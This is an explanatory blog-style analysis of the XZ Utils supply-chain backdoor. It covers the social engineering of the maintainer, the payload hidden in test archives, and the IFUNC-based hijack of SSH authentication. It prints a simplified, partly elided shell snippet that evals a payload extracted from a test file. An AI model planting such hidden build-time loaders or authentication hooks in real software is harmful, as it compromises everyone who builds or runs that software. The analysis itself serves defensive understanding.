The 500ms Delay That Saved the Internet: Dissecting the XZ Utils Backdoor

Most critical vulnerabilities are accidents—a buffer overflow here, a logic error there. This is not that. This is a masterclass in patience and malice. CVE-2024-3094 isn't a bug; it's a warhead.

It all started when Andres Freund, a Microsoft PostgreSQL developer, noticed that sshd was taking a few hundred milliseconds longer to start and consuming too much CPU. Most of us would blame DNS or just restart the service. Andres grabbed a profiler.

He found that liblzma, a compression library used by XZ Utils, was doing things it had no business doing inside the SSH daemon. Why is a compression library hanging out in your secure shell? Thanks to some distros patching OpenSSH to support systemd notifications, liblzma gets pulled in as a dependency. This created the perfect vector: a ubiquitous, boring library that nobody audits, running inside the most sensitive process on a Linux server.

Before we look at the code, we have to respect the hustle. The persona 'Jia Tan' didn't just hack a server; they hacked the human trust model of open source. Starting in 2021, they submitted helpful patches. They fixed bugs. They answered emails. They pressured the burned-out original maintainer, Lasse Collin, citing mental health issues to gain commit access.

[!NOTE] The Lesson: This wasn't a technical exploit of code; it was an exploit of maintainer burnout.

By 2024, Jia Tan was a trusted maintainer. They used this trust to sneak the backdoor into the release tarballs of versions 5.6.0 and 5.6.1. Note the distinction: the backdoor was not in the public Git repository source code. It was injected only during the packaging process, hidden inside binary test files that looked like corrupted archives.

The brilliance of this attack lies in its build-system obfuscation. The attacker didn't just write if (attacker) grant_root(). They hid the logic in build-to-host.m4, a macro file used during the ./configure stage.

This script unpacked a 'test file' (bad-3-corrupt_lzma2.xz), which was actually a pre-compiled object file. It then modified the Makefile to link this object file into liblzma. Here is a simplified view of the injection logic:

# The obfuscated script checks if we are building for Linux x86_64
if [[ "$host" == *linux* ]]; then
    # Extract the payload from the 'corrupt' test files
    eval "$($SED n-p $srcdir/tests/files/bad-3-corrupt_lzma2.xz | tr ...)"
fi

The script was designed to look like standard autotools junk—a language so unreadable that even seasoned C developers gloss over it. This allowed the backdoor to survive casual inspection.

Once linked, how does a compression library hijack SSH? The attacker used the GNU Indirect Function (IFUNC) mechanism. IFUNC is intended to allow a program to select the most optimized version of a function (e.g., memcpy) at runtime based on the CPU's capabilities.

The backdoor registers an IFUNC resolver. When the dynamic linker loads liblzma, it calls this resolver. The resolver doesn't just check for AVX instructions; it walks the Global Offset Table (GOT) and looks for the symbol RSA_public_decrypt.

It replaces the real RSA_public_decrypt function pointer with its own malicious wrapper. Now, every time someone tries to authenticate via SSH, the backdoor gets the public key first.

The backdoor is an RCE, but only for the person holding the private key. It doesn't allow anyone to login; it allows Jia Tan to login.

Inside the hijacked RSA_public_decrypt, the code inspects the incoming RSA certificate. It looks for a specific hidden payload signed with the attacker's Ed448 key. The crypto inside the backdoor is surprisingly robust, using a ChaCha20 implementation to decrypt the command payload.

If the signature verifies correctly against the hardcoded public key in the backdoor:

1. The command is extracted.
2. It is passed strictly to system().
3. The backdoor essentially bypasses the rest of authentication and executes the command as root.

If the signature fails? It falls back to the original RSA_public_decrypt, and the login proceeds normally. This made the backdoor nearly invisible to network scanners.